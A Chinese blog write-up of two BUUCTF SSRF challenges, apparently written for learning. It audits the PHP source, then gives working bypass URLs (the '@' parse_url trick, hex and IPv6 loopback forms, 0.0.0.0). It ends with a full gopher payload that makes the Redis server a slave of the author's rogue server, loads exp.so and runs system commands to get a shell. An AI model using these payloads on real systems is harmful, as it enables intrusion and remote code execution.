ssrf刷题——buu [第二章 web进阶]SSRF Training [网鼎杯 2020 玄武组]SSRFMe

最新推荐文章于 2024-06-21 17:37:54 发布
最新推荐文章于 2024-06-21 17:37:54 发布
阅读量1.4k 收藏 29
点赞数 14
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/139228734
版权

[第二章 web进阶]SSRF Training

点击即可获得源码

 <?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

源码审计

get方式传参

是否存在url

url不为空就调用safe_request_url()函数

来看一下这个safe_request_url和check_inner_ip两个需要绕过的过滤函数

function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    //检查请求的url是否为正确的格式
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    //parse_url 是 PHP 的一个内置函数。
    它用于解析 URL,并返回一个关联数组,包含了 URL 的各个部分,
    比如协议、主机名、路径等。
    parse_url 函数可以帮助开发者在处理 URL 时更方便地提取其中的信息,例如在这段代码中,它被用来解析用户输入的 URL。
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip);
    //ip2long 是 PHP 中的一个内置函数,用于将 IPv4 地址转换为对应的长整型数字。

IPv4 地址由四个十进制数(每个数范围在 0 到 255 之间)组成,用点分十进制表示(例如:"192.168.1.1")。
ip2long 函数将这种点分十进制表示的 IPv4 地址转换为一个长整型数字,方便进行比较和处理。
这个长整型数字可以更有效地存储和比较,通常用于 IP 地址的操作和计算。
 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 
//这行代码是在检查给定的 IP 地址是否属于内部 IP 地址范围:

    ip2long('127.0.0.0'): 将 IPv4 地址 "127.0.0.0" 转换为长整型数字。
    >> 24: 对长整型数字进行右移 24 位,这相当于将 IP 地址的前 3 个字节移出,只留下第一个字节。
    == $int_ip >> 24: 比较经过右移操作的 "127.0.0.0" 的结果是否与输入的 IP 地址的前 3 个字节相同。如果相同,则说明该 IP 地址属于 "127.0.0.0/8" 的范围。

同样的逻辑被应用于其他内部 IP 地址范围:

    "10.0.0.0/8" 被右移 24 位后与输入 IP 地址的前 3 个字节进行比较。
    "172.16.0.0/12" 被右移 20 位后与输入 IP 地址的前 3 个字节进行比较。
    "192.168.0.0/16" 被右移 16 位后与输入 IP 地址的前 3 个字节进行比较。

如果给定的 IP 地址匹配了这些范围中的任何一个,则返回 true,否则返回 false。
 //综上所述,这里就是一个IP白名单,不允许我们输入类似127.*.*.*、10.*.*.*、172.16.*.*、192.168.*.*

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init();  //初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用
        curl_setopt($ch, CURLOPT_URL, $url); //访问的域名
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        //curl_setopt函数参数解释:https://www.cnblogs.com/lilyhomexl/p/6278921.html
        $output = curl_exec($ch); //执行一个cURL会话并且获取相关回复
        $result_info = curl_getinfo($ch); 
        //php curl请求在curl_exec()函数执行之后,可以使用curl_getinfo()函数获取CURL请求输出的相关信息
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        //if的作用就是如果没有获取到信息,就重复获取,重复执行safe_request_url函数
//最后把exec后的数据dump出来
//var_dump($output);之后就出函数了
//接下来将parse_url后的url赋值给$url_parse
//如果parse_url执行失败,则返回false
        var_dump($output); 
    } 
     
}

绕过

我们最终的目的是要curl 127.0.0.1/flag然后得到dump出来的数据

那么该怎么绕过这两重检测呢

parse_url函数的绕过

PHP: parse_url - Manual

此函数返回一个关联数组,包含现有 URL 的各种组成部分。如果缺少了其中的某一个,则不会为这个组成部分创建数组项。组成部分为:

  • scheme – 如 http
  • host       域名
  • port        端口
  • pass  
  • path   路径
  • query – 在问号 ? 之后
  • fragment – 在散列符号 # 之后

  此函数并 不 意味着给定的 URL 是合法的,它只是将上方列表中的各部分分开。parse_url() 可接受不完整的 URL,并尽量将其解析正确。
  注: 此函数对相对路径的 URL 不起作用。

demo

<?php
$url = "http://www.baidu.com/suning?v=1&k=2#id"; 
echo $url.'</br>';
$parts = parse_url($url);  
var_dump($parts);
?>

这是输出

但是如果我们输入http://www.baidu.com@2333.com/suning?v=1&k=2#id

那么结果就会变成

host就会变成@后面的字符

这样我们的host就可控了

回到题目

如果我们输入'http://127.0.0.1:80@baidu.com/flag.php'

这样也无法正确绕过

因为curl_getinfo()函数也无法解析成127.0.0.1

在前面再加一个@

这样curl_getinfo()函数解析的是127.0.0.1:80

而parse_url函数解析的host是www.baidu.com

这样就成功绕过

payload:

http://c47efe80-3429-4c17-afa8-b11ed8e4fa8f.node5.buuoj.cn:81/challenge.php?url=http://@127.0.0.1:80@www.baidu.com/flag.php

[网鼎杯 2020 玄武组]SSRFMe

 <?php
function check_inner_ip($url)
{
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result)
    {
        die('url fomat error');
    }
    try
    {
        $url_parse=parse_url($url);
    }
    catch(Exception $e)
    {
        die('url fomat error');
        return false;
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

function safe_request_url($url)
{

    if (check_inner_ip($url))
    {
        echo $url.' is inner ip';
    }
    else
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        $result_info = curl_getinfo($ch);
        if ($result_info['redirect_url'])
        {
            safe_request_url($result_info['redirect_url']);
        }
        curl_close($ch);
        var_dump($output);
    }

}
if(isset($_GET['url'])){
    $url = $_GET['url'];
    if(!empty($url)){
        safe_request_url($url);
    }
}
else{
    highlight_file(__FILE__);
}
// Please visit hint.php locally.
?>

代码审计

和上一题的代码菀菀类卿

也是get方式传参

不对

是一模一样的过滤

试了一下

还是有点不一样

正则匹配不同 这里不仅支持http伪协议还支持https|gopher|dict

但是后面的匹配是正常的啊

看不懂

可能@被ban了?

不知道

还可以用0.0.0.0绕过

也可以用环回地址绕过

我自己试下来可以用的有

?url=http://0x7F000001/hint.php

?url=http://[0:0:0:0:0:ffff:127.0.0.1]/hint.php

?url=http://0.0.0.0/hint.php

——————————————更新——————————————

上面那个问题  大佬给出答案

然后我们终于来到第二步

if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
  highlight_file(__FILE__);
}
if(isset($_POST['file'])){
  file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}

有点不懂下一步的思路是什么

看佬的wp

这里提示 redis pass

要用 redis主从复制来打

redis主从复制

主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。
redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中,但是如果硬盘的数据被删除的话数据就无法恢复了,如果通过主从复制就能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据时就会通过主从复制复制到其它从redis。

所以我们这题的思路是,创建一个恶意的Redis服务器作为Redis主机(master),该Redis主机能够回应其他连接他的Redis从机的响应。有了恶意的Redis主机之后,就会远程连接目标Redis服务器,通过 slaveof 命令将目标Redis服务器设置为我们恶意Redis的Redis从机(slaver)。然后将恶意Redis主机上的exp同步到Reids从机上,并将dbfilename设置为exp.so。最后再控制Redis从机(slaver)加载模块执行系统命令即可。

需要用到的工具

redis-rogue-server

redis-ssrf

这个ssrf-redis是用于生成gopher伪协议的脚本

我们根据我们的需要修改

这里主机改成我们自己的vps的ip地址

端口需要和rogue-server.py里的端口相同

command改成我们需要rce的命令

这里的passwd改成他提示的root

(注意这里默认打开的exp.so的路径是tmp 记得要不改脚本 要不就是把rogue-server.py和exp.sod都放在tmp)

rogue-server.py主要是创建了一个监听端口为 6666 的恶意 Redis 服务器。当有客户端连接并发送特定命令(如 PING、REPLCONF、PSYNC 或 SYNC)时,服务器会返回相应的响应,其中包括了一个恶意的 PAYLOAD

(要把rogue-server.py和exp.so放在同一个目录下)

先生成gopher伪协议脚本

因为还需要在url中传参,会解码一次,所以还需要url编码一次

启动rogue-server.py 成功执行

就成功反弹shell

然后分析一下这个gopher伪协议

gopher://0.0.0.0:6379/_*2 $4 AUTH $4 root *3 $7 SLAVEOF $14 ‘**********’ $4 6666 *4 $6 CONFIG $3 SET $3 dir $5 /tmp/ *4 $6 config $3 set $10 dbfilename $6 exp.so *3 $6 MODULE $4 LOAD $11 /tmp/exp.so *2 $11 system.exec $14 cat${IFS}/flag *1 $4 quit

总结一下

虽然跟着wp复现完了

但是对于redis主从攻击还是有点云里雾里

哪天要手动构造一下gopher脚本

自己复现一下这个漏洞

阿呆不呆@qq
关注
  • 14
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第29天:WEB漏洞-CSRF及SSRF漏洞案例讲解1
08-03
1、当用户发送重要的请求时需要输入原始密码 3、检验 referer 来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章, 4、设置验证码
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
[第二章 web进阶]SSRF Training 1
qq_45951598的博客
03-05 1402
一开始打开环境,可以看到一个链接,打开看一下。 打开是个代码审计 <?php highlight_file(__FILE__);//用PHP高亮显示当前的文件 function check_inner_ip($url) //获取url的域名,将域名转为ip,然后再判断这个ip是否是私有地址 { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); //返回$url的匹配,值将是 0 次(不匹配)或 1
BUU [第二章 web进阶]SSRF Training
qq_62078839的博客
04-18 1751
打开连接发现页面上提示了flag.php,那么flag应该就放在这里了,点开intersting challenge 出现源码,审计代码 <?php highlight_file(__FILE__); function check_inner_ip($url) { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { ...
[第二章 web进阶]SSRF Training
u011250160的博客
12-18 896
查看题目,点击intersting challenge发现源码 然后就是源码审计 首先url经过的函数是 function check_inner_ip($url) { //正则匹配 $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { //解析url,详细
《从0到1:CTFer成长之路》书籍配套题目 [第二章 web进阶]SSRF Training
qq_59607911的博客
10-31 85
safe_request_url检测之后 parse_url取到的host是baidu.com,而curl取到的是127.0.0.1:80,所以就实现了检测IP时候是一个正常的一个网站域名而实际curl请求的时候是构造的127.0.0.1。而curl取到的是127.0.0.1:80,所以就实现了检测IP时候是一个正常的一个网站域名而实际curl请求的时候是构造的127.0.0.1。点进 intersting challenge,开始看它的代码。prase_url绕过。
buuctf[第二章 web进阶]SSRF Training 1
m0_52299173的博客
07-08 775
[第二章 web进阶]SSRF Training 1
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF_Vulnerable_Lab:本实验包含易受服务器端请求伪造攻击的示例代码
05-12
我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的鼓励)以及在DNS重新绑定攻击基础上共同努力的研究人员说谢谢 脆弱代码旨在针对以下5种情况演示SSRF: 1....
工作实践:11种API性能优化方法
BUG指挥课堂
06-21 893
上面这个例子中,发站内通知和用户操作日志功能,对实时性要求不高,即使晚点写库,用户无非是晚点收到站内通知,或者运营晚点看到用户操作日志,对业务影响不大,所以完全可以异步处理。但是,如果一次性查询的用户数量太多,例如一次查询2000个用户的数据,传入2000个用户的ID进行远程调用时,用户查询接口经常会出现超时的情况。这种情况下,接口的一次请求会涉及到非常长的调用链路。当系统发展到一定阶段,用户并发量增加,会有大量的数据库请求,这不仅需要占用大量的数据库连接,还会带来磁盘IO的性能瓶颈问题。
Android14 开发之Broadcast延迟及Service常驻等新特性说明
虎哥LoveDroid
06-20 914
通过以上步骤,您可以在 Android 13 中根据Intent的action启动服务,并确保服务在后台运行时不会被系统终止。使用前台服务可以确保服务的持久性,并且可以处理新的权限要求和行为变化。
android CancellationException 了解
阿饱同学
06-21 336
Android开发中,通常是在协程或预期完成的任务被取消时遇到的异常。这种异常是Kotlin协程的一部分,也可以在各种异步任务管理库中找到。
我该如何设置Android SDK环境变量配置成功
读心悦
06-20 385
通过以上步骤,你应该能够成功设置Android SDK环境变量配置。如果在配置过程中遇到任何问题,请检查你的安装路径和输入是否正确。
深入了解PHP的If...Else语句
Perfect—完美的博客
06-20 486
if…else语句用于根据条件执行不同的代码块。if (条件) {// 当条件为真时执行的代码} else {// 当条件为假时执行的代码if…else语句是PHP中最基础也是最重要的控制结构之一。通过使用if、if…else、if…elseif…else以及嵌套if语句,可以实现复杂的条件判断逻辑。条件运算符和switch语句提供了更加简洁和高效的代码写法。掌握这些控制结构的用法,将有助于你编写更加灵活和健壮的PHP代码。
Android RecyclerView原理语法和用法
micro9981的专栏
06-20 788
Android 中用于显示大量数据的高级视图件。它是 的改进版,具有更高的性能和灵活性。以下是关于 的详细介绍,包括其原理、语法、优缺点和使用方法。 的核心原理是通过视图复用来提高性能。当用户滚动列表时, 只会创建和绑定当前可见的项,而不是为每个数据项都创建一个新的视图。这是通过 ViewHolder 模式和 Adapter 来实现的。使用 的基本步骤包括: 优缺点 优点 性能优越: 通过视图复用和 ViewHolder 模式, 能够有效减少内存使用和提高滚动性能。 灵活性高: 支持不
Android AlarmManager 设定过去的时间会触发事件
最新发布
WillWolf_Wang的博客
06-21 197
在使用 AlarmManager 做每日定时任务时,发现如果设定的时间小于当前的系统时间,那么设定后会立刻收到一次定时任务回调。我们设想的是设定的时间应该是明日的这个时间,但是如果打印出设定的时间会发现,设定的时间是今天的。所以,为了避免时间已经过去还引发回调,可以添加一个时间判断。这样设定的触发时间就是明天的了。
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
SSRF (Server-Side Request Forgery) 漏洞是一种常见的 Web 安全漏洞,攻击者通过构造恶意的请求,从而使服务器发起非预期的请求,可能导致敏感信息泄露、服务器受到攻击等后果。 在内网渗透中,SSRF 漏洞可以用来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值